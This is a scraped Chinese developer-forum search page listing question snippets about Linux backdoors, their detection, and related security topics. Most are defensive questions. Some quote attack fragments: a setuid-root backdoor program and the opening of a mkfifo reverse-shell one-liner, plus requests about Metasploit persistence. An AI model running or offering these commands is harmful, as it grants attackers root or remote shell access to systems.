腾讯云
开发者社区
文档
建议反馈
控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
登录/注册
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
3
回答
在
Linux
内核中包含二进制blobs意味着什么?
linux
、
obfuscation
、
driver
知道了这一点,从安全的角度来看,如何才能将二元水泡作为
Linux
内核的一部分来运行呢?存在一个内核的
无
blob版本。这个项目背后的动机似乎主要是意识形态的。二进制blob是否能包含一个rootkit,用于接管或打开
后门
进入整个系统?怎么能发现这样的
后门
呢?
浏览 0
提问于2013-06-10
得票数 8
回答已采纳
2
回答
在企业环境中使用Kali
Linux
安全吗?
metasploit
、
kali-linux
Kali
Linux
是否包含经过审核的软件,该软件旨在帮助安全性,并且基本上不包含任何
后门
?Kali
Linux
有一些
后门
的历史吗?还是允许第三方访问经过审计的系统?
浏览 0
提问于2016-10-27
得票数 0
回答已采纳
1
回答
您将使用哪些功能来检测
后门
或机器人安装?
malware
、
detection
、
backdoor
、
intrusion
、
machine-learning
我读了一份关于
日志
和分析的文档。本文件讨论了统计分析和机器学习技术,以检测一些攻击场景。我有一个用例,我感兴趣的是检测攻击,试图下载和安装
后门
。我从IDS、防火墙、HTTP服务器和Syslog服务器收集了
日志
。我想找到一些指示性的功能,我可以提供给我的机器学习模型。下面的图片显示了我面临的问题:这位研究员手动分析了
日志
,并提供了一些有用的见解。但他只使用了源代码机器(Http)。具体来说,这些
日志
中的数据字段。 这是否意味着
后门
很难被安全设备发现?如果我想使用其他功能,如蛮力示例所
浏览 0
提问于2019-02-21
得票数 2
2
回答
后门
怎么走?
windows
、
linux
、
backdoor
、
root
我研究了一下,我感到惊讶的是,在我扎根之后,把一台
Linux
机器
后门
是多么容易。0,0,0);}chown root:root backdoor因此,现在,任何用户都可以使用
后门
作为/backdoor whoami在获得root等效(NT AUTHORITY\SYSTEM)之后,我如
浏览 0
提问于2022-11-09
得票数 -1
1
回答
英特尔SA00086 / CVE-2017-5712可远程利用吗?
network
、
linux
、
exploit
我意识到,像Windows域管理一样的东西可以作为“远程管理”与本地访问相匹配,但是这如何适用于不允许远程访问根( Admin )的
Linux
系统呢?
浏览 0
提问于2017-11-24
得票数 1
回答已采纳
3
回答
如果
Linux
允许来自公众的开源贡献,它如何是安全的?
malware
、
linux
、
operating-systems
、
backdoor
、
opensource
根据我对
Linux
的简要了解,来自世界各地的开发人员提交的代码将包含在
Linux
更新中。然后由安全管理员对其进行审查。一旦获得批准,它就会传递给
Linux
的创始人Linus,以获得他的最终批准。由于所有这些代码都是由世界各地不知名的开发人员提交的,安全管理员如何确保没有向操作系统添加任何
后门
脚本?不是有1500万行代码吗?操作系统的管理员是否真的理解每一行代码,并确信人们没有提交可能破坏系统的东西,如恶意软件、
后门
或间谍软件?
浏览 0
提问于2018-05-12
得票数 7
1
回答
我应该在C和GTK+中使用线程来为
后门
创建图形用户界面控制器吗?
c
、
multithreading
、
user-interface
、
gtk
、
gdk
场景: 我用C语言为
Linux
编写了一个CLI
后门
和一个CLI控制器。我正在使用Glade和GTK+3为控制器创建一个图形用户界面。我希望控制器(基本上是一个具有反向功能的服务器)始终接受来自
后门
(具有反向功能的客户端)的连接。同时,我希望将控制器中TextBuffer小部件上编写的命令发送到
后门
,并将接收到的输出写回
后门
。
浏览 4
提问于2020-06-23
得票数 1
1
回答
对于
Linux
,是否有相当于meterpreter的“运行持久性”?
metasploit
与问题一样,我如何在
Linux
目标上安装带有Metasploit的持久
后门
?
浏览 0
提问于2015-07-27
得票数 2
1
回答
Eclipse中的Tomcat服务器:目标目录中的war没有正确部署
java
、
eclipse
、
maven
、
tomcat
、
m2eclipse
变量
后门
的值在配置文件dev中等于true。dev.properties当我试图访问web应用程序时,我只看到了空白页。我决定以调试模式启动服务器,以检查变量
后门
的值,它仍然等于${
后门
}我解压缩war文件以查看
浏览 6
提问于2020-09-21
得票数 0
2
回答
本地文件包含(后期开发)
windows
、
sensitive-data-exposure
、
file-inclusion
我很好奇应该在Windows服务器上查找哪种类型的敏感文件,与
Linux
相比,Windows服务器容易受到LFI的攻击?。我正在寻找可能的利用后的方法,LFI漏洞的网站是托管在Windows服务器上,而不是
Linux
。只是想在不使用外部
后门
或工具( )的情况下,对LFI进行
浏览 0
提问于2019-06-09
得票数 1
1
回答
我看到两个根用户(Ubuntu)
ubuntu
、
ubuntu-16.04
我并不是
linux
中最聪明的(这就是为什么我买了一个VPS,所以我可以学习),我以为它是某种
后门
,尽管我宁愿由你们来验证,他们知道我是否应该删除它。这是一个图片:。如果你们能告诉我这是不是
后门
那就太好了,谢谢!
浏览 3
提问于2017-08-15
得票数 0
回答已采纳
1
回答
提交给开源项目的
后门
示例?
git
、
version-control
、
open-source
、
cvs
马上澄清一下,我对写
后门
不感兴趣。我自己对提交
后门
变更列表到项目没有兴趣。我们正在研究,但是这个漏洞并没有被签入,而是修改了代码的其他版本。 在开源项目的修订历史中,有没有尝试插入
后门
代码的例子?
浏览 0
提问于2011-10-07
得票数 5
1
回答
Ubuntu软件(商店/应用程序)-总是安全的?
software-installation
我是Ubuntu的新人。我的第一台笔记本电脑运行了Ubuntu。绝对喜欢它,但我有一个问题,当我开始应用- Ubuntu软件-在哪里我可以浏览或看到编辑的选择,所有的软件在这里审查?我是否需要担心这里列出的潜在恶意软件? 蒂娅!
浏览 0
提问于2021-01-03
得票数 1
回答已采纳
2
回答
有没有办法找出我是怎么被黑的?缺点是什么?
security
我的一个网站黑了几次:(首先,我丢失了所有的数据库,一些表被清除,一些表的数据已经更改!)在第二次攻击时,所有表都被清除,一些php文件的代码被更改:/删除已创建的所有非系统Ftp帐户,或至少将密码更改为FTP帐户。检查脚本中的任何头注入攻击、Sql注入攻击、跨站点脚本攻击等,以及您的php.ini文件设置。 如果您的脚本被感染,您可能希望回滚到您的帐户的上一次良好快照备份。如果您的备份也被感染
浏览 0
提问于2010-02-23
得票数 1
3
回答
在加密系统中设置
后门
的最佳方法是什么?
encryption
、
cryptanalysis
、
algorithm-design
、
backdoors
你怎么能在加密算法中加入一个
后门
呢?有什么技术可以用来减少破解密钥所需的时间吗?我们的目标是通过收集一个弱密码样本进行实践,找出可用于加密教学的例子。
浏览 0
提问于2012-02-26
得票数 14
1
回答
有可能解码恶意的md5散列吗?
encryption
、
malware
、
php
、
virus
、
md5
生成的代码是一个简单的
后门
,允许黑客只从他们控制的一个特定URL在系统级别上执行代码。 是否有可能解码md5哈希,从而了解是哪个恶意网站使用了我的服务器的
后门
?
浏览 0
提问于2019-12-31
得票数 1
回答已采纳
1
回答
使用tcpdump记录通过路由器服务器的所有网络活动。
networking
、
tcpdump
、
backdoor
我想收集我的家庭设备(笔记本电脑,电话等)之间所有网络通讯的
日志
。IP:Port / Destination IP:Port / Protocol (Internet/Transport Layers) / Amount of data in bytesInternet ⟺ Logging Server ⟺ Wi-Fi/Ethernet Switch ⟺ Devices (该盒子将有两个
浏览 0
提问于2018-01-08
得票数 3
回答已采纳
1
回答
可以借到Netcat的侦听器吗?
tcp
、
backdoor
我一直在使用专门的软件或恶意命令进入备份计算机和服务器,这些命令会在目标计算机上产生
后门
,然后将终端传输到我服务器上的侦听netcat会话。我想知道是否有可能在使用Netcat监听端口的服务器上产生
后门
。最好是
Linux
机器。然后说他在等
后门
在受害者的机器上产卵。受害者会在他的
Linux
机器上运行一些命令,比如: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1
浏览 0
提问于2017-03-14
得票数 1
1
回答
斯基拉,
后门
错误,倍频程冲突
octave
、
scilab
、
recompile
、
lib
我从scilab.6.0.0网站安装了scilab.6.0.0和
后门
(我在Application>Module maneger>atom>Technical上找不到)。我移动了
后门
文件我的家,从scilab命令行我安装了它。-->atomsInstall('/home/user/BackDoor_0.2_5.5.bin.x86_64.
linux
.tar.gz') 尽管它成功地安装了
后门
,但是当我重新启动scilab时,我收到了这个
后门</em
浏览 12
提问于2017-05-30
得票数 1
回答已采纳
1
回答
什么是最安全的方式加密一个压缩文件?
server
、
encryption
、
gnupg
、
zip
我想对
Linux
中的zip文件进行加密,这样就没有人可以用任何工具打开或解密它。我的意思是使用没有漏洞或
后门
的加密。GnuPG加密是最好的解决方案吗? 提前谢谢。
浏览 0
提问于2017-11-01
得票数 0
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
Linux后门整理合集
Chaos:Linux后门卷土重来
Linux查看日志
Linux可疑日志分析整理
Linux之单机日志审核
热门
标签
更多标签
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
活动推荐
运营活动
广告
关闭
领券